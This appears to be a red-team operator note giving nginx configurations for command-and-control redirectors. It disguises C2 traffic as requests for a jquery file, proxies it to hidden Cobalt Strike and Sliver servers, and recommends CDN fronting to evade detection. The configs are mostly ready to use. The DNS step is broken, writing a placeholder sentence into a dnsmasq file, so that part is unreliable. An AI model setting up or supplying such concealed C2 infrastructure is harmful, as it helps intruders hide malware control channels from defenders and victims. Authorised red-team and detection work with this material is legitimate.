red-team-tools/c2-redirectors.md

C2 Redirectors (nginx)

Purpose

Redirectors proxy C2 traffic through legitimate-looking infrastructure to hide the actual C2 server.

Setup (nginx on Debian/Ubuntu)

# Install
apt install nginx openssl

# For HTTPS redirectors, get a cert:
certbot --nginx -d redirector.example.com

HTTP Redirector Config

server {
    listen 80;
    server_name redirector.example.com;
    
    location / {
        return 301 https://legitimate-site.com$request_uri;
    }
}

server {
    listen 443 ssl;
    server_name redirector.example.com;
    
    ssl_certificate /etc/letsencrypt/live/redirector.example.com/fullchain.pem;
    ssl_certificate_key /etc/letsencrypt/live/redirector.example.com/privkey.pem;
    
    location /static {
        proxy_pass https://legitimate-site.com;
        proxy_set_header Host legitimate-site.com;
    }
    
    # C2 traffic goes to actual C2
    location /jquery-3.6.0.min.js {
        proxy_pass http://10.0.0.5:8080;
    }
}

Cobalt Strike Redirector

# For Cobalt Strike C2, route traffic based on URI
location /jquery-3.6.0.min.js {
    proxy_pass http://c2-server:80;
    proxy_set_header Host staging.hoolulu.com;
}

Sliver Redirector

# Sliver uses HTTPS with specific paths
location /api/v2/status {
    proxy_pass http://sliver-server:443;
}

DNS Redirector (for DNS C2)

# Setup DNS with dnsmasq
echo "A record pointing to your C2 IP" >> /etc/dnsmasq.d/c2.conf
systemctl restart dnsmasq

Operational Notes

• Use CDN domains when possible (CloudFlare, Akamai)
• Separate redirectors per operation
• Log everything for attribution if needed
• Test redirects before engagement